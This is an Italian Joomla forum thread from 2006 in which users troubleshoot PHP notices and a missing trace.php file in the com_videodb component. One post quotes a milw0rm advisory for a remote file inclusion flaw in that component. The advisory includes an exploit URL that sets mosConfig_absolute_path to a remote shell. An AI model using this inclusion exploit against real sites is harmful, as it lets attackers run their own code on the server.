Joomla.it Forum

Joomla! 1.0.x (versione con supporto terminato) => Le voci di Joomla.it (solo per versione Joomla 1.0.x) => : harleyman 18 Nov 2006, 10:50:50

: com_videodb
: harleyman 18 Nov 2006, 10:50:50
Oggi è giornata di errori..
eccone un altro, che gentilmente mi ha fatto notare un utente
Ho il componente com_videobd, fino a qualche giorno mi andava alla grande (in realtà non mi ha mai dato problemi) ma adesso, come potete vedere dal file allegato, ci sono "un pò" di errori...
Che roba è?

[allegato eliminato da un amministratore]
: Re: com_videodb
: surfbit 18 Nov 2006, 11:41:26
L'errore in genere lo hai alla linea 530!! Prova a vedere nel file cosa richiama!!
: Re: com_videodb
: napo 18 Nov 2006, 11:49:21
Non è un errore, è una notice.
Sta a significare che il codice è scritto male. ;D
Anzichè scrivere $nomeVar["chiave"] hanno scritto $nomeVar[chiave].
Quindi PHP cerca una costante chiamata chiave, non la trova e spara fuori la notice.
Prova ad abbassare il livello di errori di Joomla.
: Re: com_videodb
: harleyman 18 Nov 2006, 13:08:56
Non è un errore, è una notice.
Sta a significare che il codice è scritto male. ;D
Anzichè scrivere $nomeVar["chiave"] hanno scritto $nomeVar[chiave].
Quindi PHP cerca una costante chiamata chiave, non la trova e spara fuori la notice.
Prova ad abbassare il livello di errori di Joomla.
Azz, effettivamente il tutto è successo dopo che ho alzato il livello di segnalazione errori di Joomla. ;D
: Re: com_videodb
: napo 18 Nov 2006, 13:56:57
Resta comunque il fatto che il codice del componente è sbagliato. 8)
: Re: com_videodb
: harleyman 18 Nov 2006, 13:59:20
Resta comunque il fatto che il codice del componente è sbagliato. 8)
alla qualc soa non so che farci, a dirti al verità. ;D
Però adesso è tornato tutto come prima, se non fosse che devo rifare tutto da capo perchè l'avevo disintallato mannaggiammè!
E... chissà come mai non mi si aprono le locandine dal sito... Aspè, ti dico l'errore:
"Not Found

The requested URL /trace.php was not found on this server."
: Re: com_videodb
: napo 18 Nov 2006, 14:03:31
ti dico l'errore:
"Not Found

The requested URL /trace.php was not found on this server."

Verifica se il file esiste.
: Re: com_videodb
: harleyman 18 Nov 2006, 14:05:13
ti dico l'errore:
"Not Found

The requested URL /trace.php was not found on this server."

Verifica se il file esiste.
Allora, praticamente, a quanto ho capito, questo componente va  afare una ricerca del film da te indicato sul sito (credo) di IMDB. E fino a qui ci siamo.
Se mi carica la locandina, intendo il thumbnail, perchè non dovrebbe esserci l'immagine vera e propria?
E se anche non ci fosse, non c'è una soluzione a ciò?
: Re: com_videodb
: napo 18 Nov 2006, 15:27:00
Verifica se il file trace.php esiste...
: Re: com_videodb
: harleyman 18 Nov 2006, 15:34:35
Effettivamente non c'è da nessuna parte...
: Re: com_videodb
: napo 18 Nov 2006, 15:40:30
Effettivamente non c'è da nessuna parte...

Verifica se c'è nel file ZIP di installazione.
: Re: com_videodb
: harleyman 18 Nov 2006, 17:08:39
Intanto una cosa... che significa stà roba?
:
com_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability

Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/7942/com_videodb_v0.3en.zip
 
bug found in file : core/videodb.class.xml.php
 
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

exploit:
http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell]
 
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink

# milw0rm.com [2006-07-17]

e poi... non riesco più a trovare da dove avevo scaricato il componente! ???
: Re: com_videodb
: harleyman 19 Nov 2006, 09:27:56
Effettivamente non c'è da nessuna parte...

Verifica se c'è nel file ZIP di installazione.
No.
Non ho trovato il file trace.php da nessuna parte, nè nella versione inglese nè quella polacca originale.
Che si fa?
Ci si attacca?
: Re: com_videodb
: napo 19 Nov 2006, 11:48:29
Allora se il file non c'è, l'errore era motivato. :D

Purtroppo se il file non c'è, hai poco da fare.